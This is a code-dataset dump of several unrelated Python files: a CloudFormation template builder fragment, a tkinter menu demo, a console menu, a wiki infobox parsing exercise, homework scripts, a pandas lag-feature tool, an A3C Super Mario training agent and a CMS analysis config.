master_can.CONFIG_DIR = deploy_workspace_dir.abspath\n master_can.create_template()\n master_template_path = Path(deploy_workspace_dir, master_can_label.filename)\n template_file_list.append(TemplateFile(template=(master_can.template),\n filepath=master_template_path))\n allowed_stack_id_list = [resource_id for resource_id in can_id_list if resource_id in master_can.TIER_LIST_TO_DEPLOY.get_value()]\n r_filter = ResourceFilter(allowed_stack_id_list)\n for resource_id, resource in list(master_can.template.resources.items()):\n keep_this_flag = r_filter.filter(resource, master_can.template)\n if not keep_this_flag:\n master_can.template.remove_resource(resource)\n else:\n if resource_id in self.canlabel_mapper:\n nested_canlabel = self.canlabel_mapper[resource_id]\n nested_can = (nested_canlabel.can_class)(**config_data)\n nested_can.create_template()\n nested_can_mapper[resource_id] = nested_can\n template_file = TemplateFile(template=(nested_can.template),\n filepath=(Path(deploy_workspace_dir, nested_canlabel.filename)))\n template_file_list.append(template_file)\n\n print('==========')\n print(can_id_list, env_tag)\n master_can.dump_cloudformation_json_config_file()\n for template_file in template_file_list:\n template_file.make_file(json_or_yml='json')\n\n return returned_list","sub_path":"pycfiles/troposphere_mate-0.0.14-py2.py3-none-any/orchestration.cpython-36.py","file_name":"orchestration.cpython-36.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388172202","text":"import tkinter.ttk as ttk\nfrom tkinter import *\nimport time\n\nroot = Tk()\nroot.title(\"my GUI\")\nroot.geometry(\"640x480\")\n\n\ndef create_new_file():\n print(\"Creating a new file\")\n\ndef open_new_file():\n print(\"Open a new file\")\n\nmenu = Menu(root)\nmenu_file = Menu(menu, tearoff=0)\nmenu_file.add_command(label=\"New File\", command= create_new_file)\nmenu_file.add_command(label=\"New Window\")\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Open File...\", command = open_new_file)\n\nmenu_file.add_command(label=\"Save All\", state=\"disable\") #\nmenu_file.add_separator()\nmenu_file.add_command(label=\"Exit\", command= 
root.quit)\nmenu.add_cascade(label=\"File\", menu=menu_file)\n# second cascade menu\nmenu.add_cascade(label=\"Edit\")\n\n# Adding language menu\nmenu_lang = Menu(menu, tearoff=0)\nmenu_lang.add_radiobutton(label=\"Python\")\nmenu_lang.add_radiobutton(label=\"Java\")\nmenu_lang.add_radiobutton(label=\"C++\")\nmenu.add_cascade(label=\"Programming Language\", menu=menu_lang)\n\n# checkbox\nmenu_view = Menu(menu, tearoff=0)\nmenu_view.add_checkbutton(label=\"Show Minimap\")\nmenu.add_cascade(label=\"View\", menu=menu_view)\n\nroot.config(menu=menu)\n\n\nroot.mainloop()","sub_path":"gui_basic/reference_pys/10_menu.py","file_name":"10_menu.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"272105454","text":"from CheckPickupJobsScreen import *\nfrom CheckDropOffJobsScreen import *\nfrom UpdateOrderProgressScreen import *\n\ndef riderScreen(rider):\n    ans = \"ON\"\n    while ans:\n        print(\"\"\"\n        Welcome back, \"\"\" + rider.getFirstName() + \"\"\"\n        1.Check pick up jobs\n        2.Check drop off jobs\n        3.Update order progress\n        4.Back\n        \"\"\")\n        # stores the user's input\n        ans = input(\"What would you like to do? \")\n\n        if(ans == \"1\"):\n            # loads the check pickup jobs screen method\n            checkPickupJobsScreen(rider)\n        elif(ans == \"2\"):\n            # loads the check drop off jobs screen method\n            checkDropOffJobsScreen(rider)\n        elif(ans == \"3\"):\n            # loads the update order progress method\n            updateOrderProgress(rider)\n        elif(ans == \"4\"):\n            # stops the while loop, which loads the previous screen method\n            ans = None\n","sub_path":"RiderScreen.py","file_name":"RiderScreen.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"292016278","text":"import gzip\nimport json\nimport os\nimport re\nimport unittest\n\n\ndef united_kingdom(filepath):\n    with gzip.open(filepath, 'rt') as data:\n        for datum in data:\n            article = json.loads(datum)\n            if article['title'] == 'イギリス':\n                return article['text']\n\n\ndef infobox_without_emphasis(text):\n    return dict([[key, re.sub(\"'{2,3}|'{5}\", '', value)]\n                 for key, value in re.findall('\\\|(.*?) = (.*)', text)])\n\n\nclass TestCase(unittest.TestCase):\n\n    def setUp(self):\n        self.filepath = os.path.join(\n            os.path.dirname(os.path.realpath(__file__)),\n            os.pardir,\n            'data',\n            'jawiki-country.json.gz')\n        self.text = united_kingdom(self.filepath)\n\n    def test_infobox_without_emphasis(self):\n        actual = infobox_without_emphasis(self.text)\n        expected = {'略名': 'イギリス',\n                    '日本語国名': 'グレートブリテン及び北アイルランド連合王国',\n                    '公式国名': ('{{lang|en|United Kingdom of Great Britain '\n                              'and Northern Ireland}}英語以外での正式国名:<br />'),\n                    '国旗画像': 'Flag of the United Kingdom.svg',\n                    '国章画像': ('[[ファイル:Royal Coat of Arms of '\n                              'the United Kingdom.svg|85px|イギリスの国章]]'),\n                    '国章リンク': '([[イギリスの国章|国章]])',\n                    '標語': ('{{lang|fr|Dieu et mon droit}}<br />'\n                           '([[フランス語]]:神と私の権利)'),\n                    '国歌': '[[女王陛下万歳|神よ女王陛下を守り給え]]',\n                    '位置画像': 'Location_UK_EU_Europe_001.svg',\n                    '公用語': '[[英語]](事実上)',\n                    '首都': '[[ロンドン]]',\n                    '最大都市': 'ロンドン',\n                    '元首等肩書': '[[イギリスの君主|女王]]',\n                    '元首等氏名': '[[エリザベス2世]]',\n                    '首相等肩書': '[[イギリスの首相|首相]]',\n                    '首相等氏名': '[[デーヴィッド・キャメロン]]',\n                    '面積順位': '76',\n                    '面積大きさ': '1 E11',\n                    '面積値': '244,820',\n                    '水面積率': '1.3%',\n                    '人口統計年': '2011',\n                    '人口順位': '22',\n                    '人口大きさ': '1 E7',\n                    '人口値': ('63,181,775[http://esa.un.org/unpd/wpp/'\n                             'Excel-Data/population.htm United Nations '\n                             'Department of Economic and Social Affairs'\n                             '>Population Division>Data>Population>Total '\n                             'Population]'),\n                    '人口密度値': '246',\n                    'GDP統計年元': '2012',\n                    'GDP値元': ('1兆5478億'\n                              '[http://www.imf.org/external/pubs/ft/weo/'\n                              '2012/02/weodata/weorept.aspx?pr.x=70&pr.y=13'\n                              '&sy=2010&ey=2012&scsm=1&ssd=1&sort=country&ds=.'\n                              '&br=1&c=112&s=NGDP%2CNGDPD%2CPPPGDP%2CPPPPC'\n                              '&grp=0&a= IMF>Data and Statistics>'\n                              'World Economic Outlook Databases>'\n                              'By Countrise>United Kingdom]'),\n                    'GDP統計年MER': '2012',\n                    'GDP順位MER': '5',\n                    'GDP値MER': '2兆4337億',\n                    'GDP統計年': '2012',\n                    'GDP順位': '6',\n                    'GDP値': '2兆3162億',\n                    'GDP/人': '36,727',\n                    '建国形態': '建国',\n                    '確立形態1': ('[[イングランド王国]]/[[スコットランド王国]]'\n                               '<br />(両国とも[[連合法 (1707年)|1707年連合法]]まで)'),\n                    '確立年月日1': '[[927年]]/[[843年]]',\n                    '確立形態2': ('[[グレートブリテン王国]]建国<br />'\n                               '([[連合法 (1707年)|1707年連合法]])'),\n                    '確立年月日2': '[[1707年]]',\n                    '確立形態3': ('[[グレートブリテン及びアイルランド連合王国]]建国'\n                               '<br />([[連合法 (1800年)|1800年連合法]])'),\n                    '確立年月日3': '[[1801年]]',\n                    '確立形態4': \"現在の国号「グレートブリテン及び北アイルランド連合王国」に変更\",\n                    '確立年月日4': '[[1927年]]',\n                    '通貨': '[[スターリング・ポンド|UKポンド]] (£)',\n                    '通貨コード': 'GBP',\n                    '時間帯': '±0',\n                    '夏時間': '+1',\n                    'ISO 3166-1': 'GB / GBR',\n                    'ccTLD': '[[.uk]] / [[.gb]]使用は.ukに比べ圧倒的少数。',\n                    '国際電話番号': '44',\n                    '注記': ''}\n        self.assertEqual(actual, expected)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"code/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":5535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"13876501","text":"# Task 1: a straight line of the form y = kx + b is given as a string.\n# Determine the y coordinate of the point with a given x coordinate.\n# Compute and print y.\n#\n# equation = 'y = -12x + 11111140.2121'\n# x = 2.5\n# hint: you already have x; use slices to extract the values of k and b,\n# then print the final result: print('y = {}'.format(k * x + b))\n\n# 1\nprint(\"1st part:\")\n# y = kx + b\nequation = \"y = -12x + 11111140.2121\"\nx = 2.5\n# y = k * x + b = (-12 * 2.5) + 11111140.2121\nk = int(equation[4:7])\nb = float(equation[-13:])\nprint(\"y = {}\".format(k * x + b))\n\n\n# Task 2: a date is given as a string in the format 'dd.mm.yyyy'.\n# Check whether the date was entered correctly.\n# Validity conditions:\n\n# 1. The length of each part of the source string must match the format\n# (i.e. 2 characters (digits) for the day, 2 for the month, 4 for the year)\n\n# 2. The day must convert to an integer in the range 1 to 30(31)\n# (depending on the month; February is not considered)\n# 3. The month must convert to an integer in the range 1 to 12\n# 4. The year must convert to a positive integer in the range 1 to 9999\n\n# 2\nprint(\"2nd part:\")\ndate = input(\"Enter date (dd.mm.yyyy):\\\n\")\n\ndate_list = date.split(\".\")\n\ndate_length = 0  # initial value\nfor i in date_list:\n    date_length += len(i)\n\ncorrect_date_length = 8\nmax_day = 31\nmax_month = 12\nmax_year = 9999\n\nday = int(date_list[0])\nmonth = int(date_list[1])\nyear = int(date_list[2])\n\nif date_length != correct_date_length:\n    print(\"Invalid date format\")\nelif max_day < day or day < 1:\n    print(\"Invalid day\")\nelif max_month < month or month < 1:\n    print(\"Invalid month\")\nelif max_year < year or year < 1:\n    print(\"Invalid year\")\nelse:\n    print(\"Correct date format\")","sub_path":"lesson_02/home_work/hw02_hard.py","file_name":"hw02_hard.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"246185294","text":"import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport functools\nimport sys\nimport getopt\n\ndef main():\n    try:\n        argv = sys.argv[1:]\n        opts, args = getopt.getopt(argv, \"a:i:c:p:f:s:\", [\"allcol=\", \"ifile=\", \"col=\", \"plag=\", \"flag=\", \"show=\"])\n    except getopt.GetoptError:\n        return None\n\n    input_file = None\n    # input_file = \"yc_change_1_19950104_20180531.csv\"  # debug override; left commented so the fallback below can run\n    target_col = None\n    all_col = False\n    plag = 5\n    flag = 1\n    show = False\n\n    for o, a in opts:\n        if o in (\"-i\", \"--ifile\"):\n            input_file = a\n        elif o in (\"-a\", \"--allcol\"):\n            all_col = True\n        elif o in (\"-c\", \"--col\"):\n            target_col = a\n        elif o in (\"-p\", \"--plag\"):\n            plag = int(a)\n        elif o in (\"-f\", \"--flag\"):\n            flag = int(a)\n        elif o in (\"-s\", \"--show\"):\n            show = int(a)\n\n    if input_file is None:\n        input_file = \"sample_data.csv\"\n        print(\"Using sample data...
Please specify input_file and target_col with -i and -c\")\n\n    if target_col is None:\n        target_col = \"EURUSD\"\n        print(\"Using sample column (EURUSD)... Please specify input_file and target_col with -i and -c\")\n\n    if all_col:\n        all_col_run(input_file, plag, flag)\n    else:\n        run(input_file, target_col, plag, flag, show)\n\n\ndef mdy(date_vector):\n    out_date = []\n    for d in date_vector:\n        out_date.append(datetime.strptime(d, \"%m/%d/%Y\"))\n\n    return out_date\n\ndef add_lag_columns(sub_df, pastlag_upto = 5, fwdlag_upto = 1, target_col = None):\n    if target_col is None:\n        colname = sub_df.columns.values[0]\n    else:\n        colname = target_col\n\n    if pastlag_upto > 0:\n        for i in np.arange(pastlag_upto+1):\n            temp_name = \"p_\" + target_col + \"_\" + str(i)\n            with pd.option_context('mode.chained_assignment', None):\n                sub_df.loc[:,temp_name] = sub_df[colname].shift(i)\n\n    if fwdlag_upto > 0:\n        for i in 1+np.arange(fwdlag_upto):\n            temp_name = \"f_\" + target_col + \"_\" + str(i)\n            with pd.option_context('mode.chained_assignment', None):\n                sub_df.loc[:,temp_name] = sub_df[colname].shift(-i)\n\n    fdf = sub_df.drop([colname], axis = 1)\n\n    return fdf\n\ndef all_col_run(input_file, plag, flag):\n    df = pd.read_csv(input_file)\n    df[\"Date\"] = mdy(df[\"Date\"])\n    df = df.set_index([\"Date\"])\n    df_all = []\n    for target_col in df.columns.values:\n        sub_df = df[[target_col]]\n        df_wlag = add_lag_columns(sub_df, plag, flag, target_col)\n        df_all.append(df_wlag)\n\n    fdf = functools.reduce(lambda x, y: pd.merge(x, y, left_index = True, right_index = True, how = \"outer\", sort = True), df_all)\n    fdf.index.names = ['Date']\n    output_name = input_file.split(\".\")[0] + \"_\" + str(plag) + \"_\" + str(flag) + \".csv\"\n\n    fdf.to_csv(output_name)\n    print(\"All Columns: Output Successful!\")\n\ndef run(input_file, target_col, plag, flag, show):\n    # Import\n    df = pd.read_csv(input_file)\n    # df.columns[0] = \"Date\"\n    if show:\n        print(df.columns)\n        sys.exit()\n\n    # Clean\n    df[\"Date\"] = mdy(df[\"Date\"])\n    df = df.set_index([\"Date\"])\n\n    # Subset\n    sub_df = df[[target_col]]\n\n    # Transform and Modify\n\n    # Add Lags\n    df_wlag = add_lag_columns(sub_df, plag, flag, target_col)\n\n    # Final Clean\n\n    # Output\n    output_name = target_col + \"_\" + str(plag) + \"_\" + str(flag) + \".csv\"\n    df_wlag.to_csv(output_name)\n    print(\"Output Successful!\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"Archive/Step1_PrepareData/PreData.py","file_name":"PreData.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"335443391","text":"import gym_super_mario_bros\nfrom src.actions import REALLY_COMPLEX_MOVEMENT\nfrom nes_py.wrappers import BinarySpaceToDiscreteSpaceEnv\nfrom keras.layers import Dense, Flatten, Input, Conv2D, MaxPooling2D, Dropout, concatenate\n#from keras.layers.convolutional import Conv2D\nfrom keras.optimizers import RMSprop, Adam\nfrom keras import backend as K\nfrom keras.models import Model\nimport tensorflow as tf\nimport numpy as np\nimport threading\nimport random\nimport time\nimport gym\n\n\n\ndef to_grayscale(img):\n    return np.mean(img, axis=2).astype(np.uint8)\ndef downsample(img):\n    return img[47:223:2, 0:256:2]\ndef expand_dimension(img):\n    return np.expand_dims(img, axis=2)\ndef preprocess(img):\n    return expand_dimension(to_grayscale(downsample(img)))\n\naction_size = 13\n# Initialize Global Variables\nglobal episode\nepisode = 0\nglobal thread_num\nthread_num = 1\nEPISODES =
8000000\n\n\n\n\n# Global Network\nclass A3CAgent:\n def __init__(self, action_size):\n self.state_size = (88, 128, 4)\n self.action_size = action_size\n # A3C Parameters\n self.discount_factor = 0.99\n self.actor_lr = 0.0017\n self.critic_lr = 0.0017\n # Number of Threads\n self.threads = 8\n # Loading model weights\n self.if_load_model = False\n # Building Global Network\n self.actor, self.critic = self.build_model()\n\n\n\n # Customized optimizer for entropy calculation\n self.optimizer = [self.actor_optimizer(), self.critic_optimizer()]\n\n # Applying Tensorboard\n self.sess = tf.InteractiveSession()\n K.set_session(self.sess)\n self.sess.run(tf.global_variables_initializer())\n if self.if_load_model:\n self.load_model('./save/Mario_A3C_DQN_2')\n print('Weight Loaded')\n self.summary_placeholders, self.update_ops, self.summary_op = \\\n self.setup_summary()\n self.summary_writer = \\\n tf.summary.FileWriter('summary/Mario_A3C_DQN_2', self.sess.graph)\n\n # Activating thread for training\n def train(self):\n # Initializing agents\n agents = [Agent(self.action_size, self.state_size,\n [self.actor, self.critic], self.sess,\n self.optimizer, self.discount_factor,\n [self.summary_op, self.summary_placeholders,\n self.update_ops, self.summary_writer])\n for _ in range(self.threads)]\n\n # Activating each agents\n for agent in agents:\n time.sleep(1)\n agent.start()\n\n # Save model every 10 min(60 sec)\n while True:\n time.sleep(60 * 10)\n self.save_model(\"./save/Mario_A3C_DQN_2\")\n print('weight saved:', time.localtime())\n\n # Building policy and value network\n def build_model(self):\n input = Input(shape=self.state_size)\n conv1 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(input)\n conv1 = Conv2D(64, (3, 3), padding = 'same', activation='relu')(conv1)\n # Simplifying network from original DQN\n #conv = Conv2D(128, (2, 2), strides=(1, 1), activation='relu')(conv)\n conv2 = Conv2D(32, (1, 1), padding = 'same', activation='relu')(input)\n conv2 = Conv2D(32, (5, 5), padding = 'same', activation='relu')(conv2)\n\n conv3 = MaxPooling2D((3, 3), strides=(1, 1), padding = 'same')(input)\n conv3 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(conv3)\n\n concat = concatenate([conv1, conv2, conv3], axis = 3)\n\n conv = Flatten()(concat)\n # Simplifying network from original DQN\n #fc = Dense(512, activation='relu')(conv)\n fc = Dense(256)(conv)\n\n # Using softmax function to make probability\n policy = Dense(self.action_size, activation='softmax')(fc)\n value = Dense(1)(fc)\n\n actor = Model(inputs=input, outputs=policy)\n critic = Model(inputs=input, outputs=value)\n\n # Making predicting function\n # According to textbook, this is not for training itself\n # For preventing error in multi-threading\n actor._make_predict_function()\n critic._make_predict_function()\n\n actor.summary()\n critic.summary()\n\n return actor, critic\n\n # Customized optimizer for updating policy network\n def actor_optimizer(self):\n action = K.placeholder(shape=[None, self.action_size])\n advantages = K.placeholder(shape=[None, ])\n\n policy = self.actor.output\n\n # Policy cross-entropy loss function\n action_prob = K.sum(action * policy, axis=1)\n cross_entropy = K.log(action_prob + 1e-10) * advantages\n cross_entropy = -K.sum(cross_entropy)\n\n # Entropy loss for continuous exploration\n entropy = K.sum(policy * K.log(policy + 1e-10), axis=1)\n entropy = K.sum(entropy)\n\n # Final loss function using both entropy\n loss = cross_entropy + 0.01 * entropy\n\n optimizer = 
RMSprop(lr=self.actor_lr, rho=0.99, epsilon=0.01, clipnorm=40)\n updates = optimizer.get_updates(self.actor.trainable_weights, [], loss)\n train = K.function([self.actor.input, action, advantages],\n [loss], updates=updates)\n return train\n\n # Customized optimizer for updating value network\n def critic_optimizer(self):\n discounted_prediction = K.placeholder(shape=(None,))\n\n value = self.critic.output\n\n # Square of [Return - Value] for loss function\n loss = K.mean(K.square(discounted_prediction - value))\n\n optimizer = RMSprop(lr=self.critic_lr, rho=0.99, epsilon=0.01)\n updates = optimizer.get_updates(self.critic.trainable_weights, [],loss)\n train = K.function([self.critic.input, discounted_prediction],\n [loss], updates=updates)\n return train\n\n def load_model(self, name):\n self.actor.load_weights(name + \"_actor.h5\")\n self.critic.load_weights(name + \"_critic.h5\")\n\n def save_model(self, name):\n self.actor.save_weights(name + \"_actor.h5\")\n self.critic.save_weights(name + \"_critic.h5\")\n\n # Recording training information each episode\n def setup_summary(self):\n episode_total_reward = tf.Variable(0.)\n episode_avg_max_q = tf.Variable(0.)\n episode_duration = tf.Variable(0.)\n\n tf.summary.scalar('Total Reward/Episode', episode_total_reward)\n tf.summary.scalar('Average Max Prob/Episode', episode_avg_max_q)\n tf.summary.scalar('Duration/Episode', episode_duration)\n\n summary_vars = [episode_total_reward,\n episode_avg_max_q,\n episode_duration]\n\n summary_placeholders = [tf.placeholder(tf.float32)\n for _ in range(len(summary_vars))]\n update_ops = [summary_vars[i].assign(summary_placeholders[i])\n for i in range(len(summary_vars))]\n summary_op = tf.summary.merge_all()\n return summary_placeholders, update_ops, summary_op\n\n\n# Actor-Runner class(Thread)\nclass Agent(threading.Thread):\n def __init__(self, action_size, state_size, model, sess,\n optimizer, discount_factor, summary_ops):\n threading.Thread.__init__(self)\n\n # Inherit from A3CAgent\n global thread_num\n self.thread_num = thread_num\n thread_num += 1\n self.action_size = action_size\n self.state_size = state_size\n self.actor, self.critic = model\n self.sess = sess\n self.optimizer = optimizer\n self.discount_factor = discount_factor\n\n [self.summary_op, self.summary_placeholders,\n self.update_ops, self.summary_writer] = summary_ops\n\n # Memory for samples, emptied every t_max time steps\n self.states, self.actions, self.rewards = [], [], []\n\n # Building local network\n self.local_actor, self.local_critic = self.build_local_model()\n\n self.avg_p_max = 0\n self.avg_loss = 0\n\n # Model update rate\n self.t_max = 30\n self.t = 0\n\n def run(self):\n global episode\n env = gym_super_mario_bros.make('SuperMarioBros-1-1-v3')\n env = BinarySpaceToDiscreteSpaceEnv(env, REALLY_COMPLEX_MOVEMENT)\n step = 0\n\n while episode < EPISODES:\n done = False\n\n max_x = 40\n no_progress = 0\n score = 0\n state = env.reset()\n\n # Making initial history with random actions\n for _ in range(5):\n next_state = state\n state, _, _, _ = env.step(0)\n\n state = preprocess(state)\n history = np.stack((state, state, state, state), axis=2)\n history = np.reshape([history], (1, 88, 128, 4))\n\n while not done:\n # Rendering code\n # Seems to be causing error in Mac OS\n if self.thread_num==1:\n env.render()\n step += 1\n self.t += 1\n\n step_reward = 0\n\n action, policy = self.get_action(history)\n\n # Taking 3 steps with selected action\n # Mimicking frame skip\n for _ in range(6):\n next_state, reward, done, info 
= env.step(action)\n score += reward\n step_reward += reward\n if done:\n break\n\n # Kill Mario if Mario is making no progress for 10 seconds\n x_now = info.get('x_pos')\n # Handling exception x_pos = 65535\n if x_now == 65535:\n x_now = max_x\n if max_x <= x_now:\n max_x = x_now\n no_progress = 0\n else:\n no_progress += 1\n if no_progress == 150:\n done = True\n reward -= 1\n step_reward -= 1\n score -= 1\n print(\"#\",self.thread_num, \" STUCK\")\n\n # Preprocessing each states\n next_state = preprocess(next_state)\n next_state = np.reshape([next_state], (1, 88, 128, 1))\n next_history = np.append(next_state, history[:, :, :, :3],\n axis=3)\n\n # Average policy max value\n self.avg_p_max += np.amax(self.actor.predict(\n np.float32(history / 255.)))\n\n\n # Appending sample\n self.append_sample(history, action, step_reward)\n history = next_history\n if self.t >= self.t_max or done:\n #if done:\n self.train_model(done)\n self.update_local_model()\n self.t = 0\n\n if done:\n # Recording training information\n\n episode += 1\n print(\"#\", self.thread_num, \" episode:\", episode, \" score:\", format(score, '.2f'), \" step:\",\n step, \"max_x :\", max_x)\n\n stats = [score, self.avg_p_max / float(step),\n step]\n for i in range(len(stats)):\n self.sess.run(self.update_ops[i], feed_dict={\n self.summary_placeholders[i]: float(stats[i])\n })\n summary_str = self.sess.run(self.summary_op)\n self.summary_writer.add_summary(summary_str, episode + 1)\n self.avg_p_max = 0\n self.avg_loss = 0\n step = 0\n\n\n # Calculating discounted prediction for future reward\n def discounted_prediction(self, rewards, done):\n discounted_prediction = np.zeros_like(rewards)\n running_add = 0\n\n if not done:\n running_add = self.critic.predict(np.float32(\n self.states[-1] / 255.))[0]\n\n for t in reversed(range(0, len(rewards))):\n running_add = running_add * self.discount_factor + rewards[t]\n discounted_prediction[t] = running_add\n return discounted_prediction\n\n # Update networks\n def train_model(self, done):\n discounted_prediction = self.discounted_prediction(self.rewards, done)\n\n states = np.zeros((len(self.states), 88, 128, 4))\n for i in range(len(self.states)):\n states[i] = self.states[i]\n\n states = np.float32(states / 255.)\n\n values = self.local_critic.predict(states)\n values = np.reshape(values, len(values))\n\n advantages = discounted_prediction - values\n\n self.optimizer[0]([states, self.actions, advantages])\n self.optimizer[1]([states, discounted_prediction])\n self.states, self.actions, self.rewards = [], [], []\n\n\n # Building local networks\n def build_local_model(self):\n input = Input(shape=self.state_size)\n conv1 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(input)\n conv1 = Conv2D(64, (3, 3), padding = 'same', activation='relu')(conv1)\n # Simplifying network from original DQN\n #conv = Conv2D(128, (2, 2), strides=(1, 1), activation='relu')(conv)\n conv2 = Conv2D(32, (1, 1), padding = 'same', activation='relu')(input)\n conv2 = Conv2D(32, (5, 5), padding = 'same', activation='relu')(conv2)\n\n conv3 = MaxPooling2D((3, 3), strides=(1, 1), padding = 'same')(input)\n conv3 = Conv2D(64, (1, 1), padding = 'same', activation='relu')(conv3)\n\n concat = concatenate([conv1, conv2, conv3], axis = 3)\n\n conv = Flatten()(concat)\n # Simplifying network from original DQN\n #fc = Dense(512, activation='relu')(conv)\n fc = Dense(256)(conv)\n\n policy = Dense(self.action_size, activation='softmax')(fc)\n value = Dense(1)(fc)\n\n local_actor = Model(inputs=input, 
outputs=policy)\n local_critic = Model(inputs=input, outputs=value)\n\n local_actor._make_predict_function()\n local_critic._make_predict_function()\n\n # Synchronizing with global network\n local_actor.set_weights(self.actor.get_weights())\n local_critic.set_weights(self.critic.get_weights())\n\n local_actor.summary()\n local_critic.summary()\n\n return local_actor, local_critic\n\n # Synchronizing with global network\n def update_local_model(self):\n self.local_actor.set_weights(self.actor.get_weights())\n self.local_critic.set_weights(self.critic.get_weights())\n\n # Selecting action from output of policy network\n def get_action(self, history):\n history = np.float32(history / 255.)\n policy = self.local_actor.predict(history)[0]\n np.random.seed(random.randint(0, 100))\n action_index = np.random.choice(self.action_size, 1, p=policy)[0]\n return action_index, policy\n\n # Using Epsilon-greedy method, but seems to be not needed\n def get_action2(self, history):\n history = np.float32(history / 255.0)\n policy = self.local_actor.predict(history)[0]\n if np.random.rand() <= self.epsilon:\n return random.randrange(self.action_size), policy\n action_index = np.random.choice(self.action_size, 1, p=policy)[0]\n return action_index, policy # returns action\n\n # Appending sample\n def append_sample(self, history, action, reward):\n self.states.append(history)\n act = np.zeros(self.action_size)\n act[action] = 1\n self.actions.append(act)\n self.rewards.append(reward)\n\n\nif __name__ == \"__main__\":\n global_agent = A3CAgent(action_size)\n global_agent.train()","sub_path":"backup/old_codes/Mario_A3C_DQN2.py","file_name":"Mario_A3C_DQN2.py","file_ext":"py","file_size_in_byte":15738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"489504743","text":"import FWCore.ParameterSet.Config as cms\n\n# analyse muon quantities\nprocess = cms.Process(\"Selection\")\n\n## configure message logger\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\nprocess.MessageLogger.cerr.threshold = 'INFO'\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10000 # !!!\n\n##\n## comment for genTag begin\n##\n\n\n\n##\n## comment for genTag end\n##\n\n\n## define input\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring( \n ## add your favourite file here\n '/store/user/rwolf/ttbar09/patTuple_all_0_ttbar09.root',\n '/store/user/rwolf/ttbar09/patTuple_all_1_ttbar09.root',\n '/store/user/rwolf/ttbar09/patTuple_all_2_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_3_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_4_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_5_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_6_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_7_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_8_ttbar09.root',\n\t '/store/user/rwolf/ttbar09/patTuple_all_9_ttbar09.root'\n\t\t\t \n\t\t\t \n## '/store/user/henderle/OctEx/Wmunu/PATtuple_1.root',\n## \t'/store/user/henderle/OctEx/Wmunu/PATtuple_2.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_3.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_4.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_5.root',\n## \t '/store/user/henderle/OctEx/Wmunu/PATtuple_6.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_7.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_8.root',\n## \t\t '/store/user/henderle/OctEx/Wmunu/PATtuple_9.root',\n## 
\t\t\t'/store/user/henderle/OctEx/Wmunu/PATtuple_10.root'\n )\n)\n\n## define maximal number of events to loop over\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(200000)\n)\n\n## configure process options\nprocess.options = cms.untracked.PSet(\n wantSummary = cms.untracked.bool(True)\n)\n\n## register TFileService\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('analyzeFullLeptonicSelection.root')\n)\n\n\n## std sequence to produce the ttGenEvt\nprocess.load(\"TopQuarkAnalysis.TopEventProducers.sequences.ttGenEvent_cff\")\n\n## filter for different ttbar decay channels\nprocess.load(\"TopQuarkAnalysis.TopEventProducers.producers.TtDecaySelection_cfi\")\nprocess.ttDecaySelection.allowedTopDecays.decayBranchA.muon = True\nprocess.ttDecaySelection.allowedTopDecays.decayBranchB.electron = True\n\n## filter for differnt final states on generator level\nprocess.load(\"TopAnalysis.TopUtils.GenFinalStateSelector_cfi\")\n\n## number of expected electrons in the final state\nprocess.genFinalStateSelector.elecs = -1\n#process.genFinalStateSelector.invert = True\n\n\n## high level trigger filter\nprocess.load(\"TopAnalysis.TopFilter.sequences.triggerFilter_cff\")\n\n\n## top decay channel analyzer\nprocess.load(\"Validation.Generator.TopDecayChannelDQM_cfi\")\n\n\nprocess.load(\"DQMServices.Core.DQM_cfg\")\nprocess.load(\"DQMServices.Components.DQMEnvironment_cfi\")\nprocess.DQM.collectorHost = ''\n\nprocess.dqmSaver.workflow = cms.untracked.string('/Test/TopDecayChannelDQM/DataSet')\n\n\n## sequence with filter for decay channel\nprocess.genFilterSequence = cms.Sequence(process.makeGenEvt *\n ## process.ttDecaySelection\n process.genFinalStateSelector\n )\n\n## sequence with filter for trigger selection\nprocess.recFilterSequence = cms.Sequence(process.hltEle15\n )\n\n## ## sequence with filter for optimal electrons --> jet analysis\n## from PhysicsTools.PatAlgos.selectionLayer1.electronCountFilter_cfi import *\n## process.electronSelection = countLayer1Electrons.clone(src = 'electronCF3',\n## minNumber = 1,\n## maxNumber = 1\n## )\n\n## ## sequence with filter for optimal jets --> muon analysis\n## from 